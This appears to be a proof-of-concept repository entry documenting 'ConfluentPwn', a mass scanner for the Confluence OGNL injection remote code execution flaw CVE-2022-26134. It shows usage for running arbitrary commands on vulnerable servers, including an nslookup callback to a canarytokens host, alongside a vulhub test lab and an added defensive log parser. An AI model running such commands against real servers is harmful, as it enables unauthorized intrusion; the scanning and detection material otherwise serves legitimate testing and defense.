POC details: 650e6e6464858af3f78a6f83602a7ff54ccee9f1

Related vulnerability
Title: Atlassian Confluence Server injection vulnerability (CVE-2022-26134)
Description: Atlassian Confluence Server is the server edition of collaboration software from the Australian company Atlassian; it provides enterprise knowledge-management features and supports building enterprise wikis. Atlassian Confluence Server and Data Center contain an injection vulnerability. An attacker can exploit it to execute arbitrary code. The following products and versions are affected: 1.3.0 to before 7.4.17, 7.13.0 to before 7.13.7, 7.14.0 to before 7.14.3, 7.15.0 to before 7.15.2, 7.16.0 to before 7.16.4
Description
Atlassian Confluence unauthenticated OGNL injection remote code execution scanner (CVE-2022-26134).
Introduction
# ConfluentPwn
Confluence pre-auth OGNL injection remote code execution scanner (CVE-2022-26134).

## Usage
The below GIF shows a demo usage of the tool:

![tooldemo](https://user-images.githubusercontent.com/39941993/172548712-6bf81497-99ec-48c2-b076-d8a472c85a1f.gif)


Here is the help output of the tool:
```
$ ./cfscan -h

  +-------------------------------+
  |    C O N F L U E N T P W N    |
  +-------------------------------+

[+] ConfluentPwn by RedHunt Labs - A Modern Attack Surface (ASM) Management Company
[+] Author: Pinaki Mondal (RHL Research Team)
[+] Continuously Track Your Attack Surface using https://redhuntlabs.com/nvadr.

Usage:
  -cmd string
        Command to execute on a vulnerable confluence server. (default "id")
  -file string
        Specify a file containing list of hosts to scan.
  -output string
        Output filepath to write the scan results into. (default "cfpwn-results.csv")
  -regex string
        Regex to match the response header for the command executed.
  -threads int
        Number of threads to use while scanning. (default 20)
  -timeout int
        HTTP timeout in seconds. (default 5)
  -user-agent string
        Custom user-agent string to use. (default "Mozilla/5.0 (ConfluentPwn) Chrome/95.0.4638.69 Safari/537.36")

Examples:
  ./cfscan 1.2.3.4:80 1.1.1.1:8080
  ./cfscan -file urls.txt
  ./cfscan -cmd 'nslookup xxxxxxxxxxxxxxxxx.canarytokens.com 1.1.1.1:80'
  ./cfscan -cmd 'ps' -regex '^\s*PID\s*TTY\s*TIME\s*CMD' http://1.1.1.1:443
```

### Specifying targets
Targets can be specified in two ways:
- Specifying URLs directly via command line.
    ```
    ./cfscan target1 target2 ...
    ```
- Specifying a file containing a list of URLs to scan using the `-file` argument.
    ```
    ./cfscan -file targets.txt
    ```

### Concurrency, timeouts and user-agents
The maximum number of targets processed concurrently can be controlled with the `-threads` argument. The default concurrency is 20.

The HTTP timeout, in seconds, can be specified with the `-timeout` argument. The default timeout is 5 seconds.

A custom User-Agent can be specified with the `-user-agent` flag, in case the user wants to track the scanner's UA string in their logs.
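Because the default User-Agent shown in the help output is distinctive, a defender can look for it in the Confluence access log to spot the scanner's probes. The following is an added example, not part of the ConfluentPwn project: it parses combined-format access log lines (constructed sample data here, not real traffic) and groups requests carrying the default UA, or any custom marker you pass, by source IP.

```python
import re
from collections import Counter, defaultdict

# Default User-Agent sent by ConfluentPwn (taken from its -h output). A custom UA can be
# set with -user-agent, so callers may pass additional markers of their own.
DEFAULT_UA = "Mozilla/5.0 (ConfluentPwn) Chrome/95.0.4638.69 Safari/537.36"

# Combined-log-format lines; constructed sample data, not captured traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [03/Jun/2022:10:01:02 +0000] "GET /login.action HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (ConfluentPwn) Chrome/95.0.4638.69 Safari/537.36"
198.51.100.4 - - [03/Jun/2022:10:01:05 +0000] "GET /dashboard.action HTTP/1.1" 200 9870 "-" "Mozilla/5.0 (Windows NT 10.0) Firefox/101.0"
203.0.113.7 - - [03/Jun/2022:10:01:09 +0000] "GET /login.action HTTP/1.1" 302 0 "-" "Mozilla/5.0 (ConfluentPwn) Chrome/95.0.4638.69 Safari/537.36"
192.0.2.9 - - [03/Jun/2022:10:02:11 +0000] "GET /rest/api/space HTTP/1.1" 200 431 "-" "internal-scanner-team-blue/1.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def find_scanner_hits(log_text, markers=(DEFAULT_UA,)):
    """Return {source_ip: [(timestamp, method, path, status), ...]} for every request
    whose User-Agent contains one of the markers (case-insensitive substring match)."""
    wanted = [m.lower() for m in markers]
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip it rather than abort the whole run
        ua = m.group("ua").lower()
        if any(w in ua for w in wanted):
            hits[m.group("ip")].append(
                (m.group("ts"), m.group("method"), m.group("path"), int(m.group("status")))
            )
    return dict(hits)


def summarize(hits):
    """Requests per source IP, most active first."""
    return Counter({ip: len(reqs) for ip, reqs in hits.items()}).most_common()


if __name__ == "__main__":
    found = find_scanner_hits(SAMPLE_LOG, markers=(DEFAULT_UA, "internal-scanner-team-blue"))
    for ip, n in summarize(found):
        print(f"{ip}: {n} request(s) with a scanner User-Agent")
        for ts, method, path, status in found[ip]:
            print(f"  {ts} {method} {path} -> {status}")
```

Note that a scanner run with `-user-agent` set to a browser-like string will not match the default marker, so the UA check complements, rather than replaces, patching and request-path monitoring.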

### Output
The output is written to a CSV file whose path can be specified with the `-output` flag. The default output file is `cfscan-results.csv` (the help output above lists it as `cfpwn-results.csv`; check `-h` on your build).

The output contains 4 columns:
- target
- confluence version
- vulnerability status
- command output

### Command Specification & Matching
The command to run on a vulnerable server is specified with the `-cmd` argument. A regular expression that must match the command's output in the response header is supplied with the `-regex` flag; a target is only reported as vulnerable when the regex matches.

The default command is `id`, and the default regex used to match its output is `uid=\d+?\(\w+?\)\s*?gid=\d+?\(\w+?\)\s*groups=\d+?\(\w+?\)`.

Using the flags together looks like:
```
./cfscan -cmd 'id' -regex 'uid=\d+?\(\w+?\)\s*?gid=\d+?\(\w+?\)\s*groups=\d+?\(\w+?\)' https://1.1.1.1
./cfscan -cmd 'ps' -regex '^\s*PID\s*TTY\s*TIME\s*CMD' http://1.1.1.1:443
```

### Setting up a Test Environment
If you'd like to test out the tool or the vulnerability in general, then you can refer to this: [https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2022-26134](https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2022-26134).

The installation process is simple; the commands below do the job:
```
$ mkdir confluentpwn && cd confluentpwn && wget https://raw.githubusercontent.com/vulhub/vulhub/master/confluence/CVE-2022-26134/docker-compose.yml
$ docker-compose up -d
```
The app should now be available at `http://localhost:8090`.

### License & Version
The tool is licensed under the MIT license. See [LICENSE](LICENSE).
Currently the tool is at v0.1.

### Credits
The Research Team at [RedHunt Labs](https://redhuntlabs.com) would like to thank [vulhub](https://github.com/vulhub/vulhub) for providing the docker test image.

##### **[`To know more about our Attack Surface Management platform, check out NVADR.`](https://redhuntlabs.com/nvadr)**
File snapshot

```
[4.0K] /data/pocs/650e6e6464858af3f78a6f83602a7ff54ccee9f1
├── [ 236] go.mod
├── [2.1K] go.sum
├── [1.0K] LICENSE
├── [4.7K] main.go
├── [4.1K] README.md
├── [1.8K] utils.go
└── [ 543] writer.go

0 directories, 7 files
```